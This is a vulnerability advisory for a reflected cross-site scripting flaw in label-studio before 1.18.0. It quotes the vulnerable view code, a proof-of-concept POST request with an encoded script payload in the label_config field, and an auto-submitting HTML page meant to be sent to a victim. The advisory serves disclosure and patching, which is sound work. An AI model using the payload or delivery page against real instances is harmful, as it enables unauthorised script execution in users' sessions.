logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2025-47783 label-studio

Package

Manager: pip
Name: label-studio
Vulnerable Version: >=0 <1.18.0

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N/E:U/RL:O/RC:C

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:L/SI:L/SA:N

EPSS: 0.00052 pctl0.16113

Details

label-studio vulnerable to Cross-Site Scripting (Reflected) via the label_config parameter. ### Summary The vulnerability allows an attacker to inject a malicious script into the context of a web page, which can lead to data theft, unauthorized actions on behalf of the user, and other attacks. ### Details The vulnerability is reproducible when sending a properly formatted request to the `POST /projects/upload-example/` endpoint. In the source code, the vulnerability is located at `label_studio/projects/views.py`. ```python 39: @require_http_methods(['POST']) 40: def upload_example_using_config(request): 41: """Generate upload data example by config only""" 42: config = request.POST.get('label_config', '') 43: 44: org_pk = get_organization_from_request(request) 45: secure_mode = False 46: if org_pk is not None: 47: org = generics.get_object_or_404(Organization, pk=org_pk) 48: secure_mode = org.secure_mode 49: 50: try: 51: Project.validate_label_config(config) 52: task_data, _, _ = get_sample_task(config, secure_mode) 53: task_data = playground_replacements(request, task_data) 54: except (ValueError, ValidationError, lxml.etree.Error): 55: response = HttpResponse('error while example generating', status=status.HTTP_400_BAD_REQUEST) 56: else: 57: response = HttpResponse(json.dumps(task_data)) 58: return response ``` The vulnerability is specifically located in line 57, where HttpResponse is used. ```python 57: response = HttpResponse(json.dumps(task_data)) ``` ### PoC Send the following request after changing the `{host}` to your own. ```css POST /projects/upload-example/ HTTP/1.1 Host: {host} Content-Type: application/x-www-form-urlencoded Content-Length: 67 label_config=%3cView%3e%3cText%20name%3d%22text%22%20value%3d%22$textjmwwi%26lt%3bscript%26gt%3balert(1)%26lt%3b%2fscript%26gt%3bs8m37%22%2f%3e%3c%2fView%3e ``` Or you can create a vulnerable HTML page by changing `{domain}` beforehand, which can later be sent to the victim. ```html <html> <body> <form action="http://{domain}/projects/upload-example/" method="POST"> <input type="hidden" name="label&#95;config" value="&lt;View&gt;&lt;Text&#32;name&#61;&quot;text&quot;&#32;value&#61;&quot;&#36;textjmwwi&amp;lt&#59;script&amp;gt&#59;alert&#40;1&#41;&amp;lt&#59;&#47;script&amp;gt&#59;s8m37&quot;&#47;&gt;&lt;&#47;View&gt;" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html> ``` ### Impact - Malicious code execution: The user may be forced to perform unwanted actions within their Label Studio account. This includes accessing `document.cookie`, but note that Label Studio session cookies are marked http-only, mitigating any possibility of session theft.

Metadata

Created: 2025-05-15T16:21:16Z
Modified: 2025-05-15T16:21:16Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-8jhr-wpcm-hh4h/GHSA-8jhr-wpcm-hh4h.json
CWE IDs: ["CWE-79"]
Alternative ID: GHSA-8jhr-wpcm-hh4h
Finding: F008
Auto approve: 1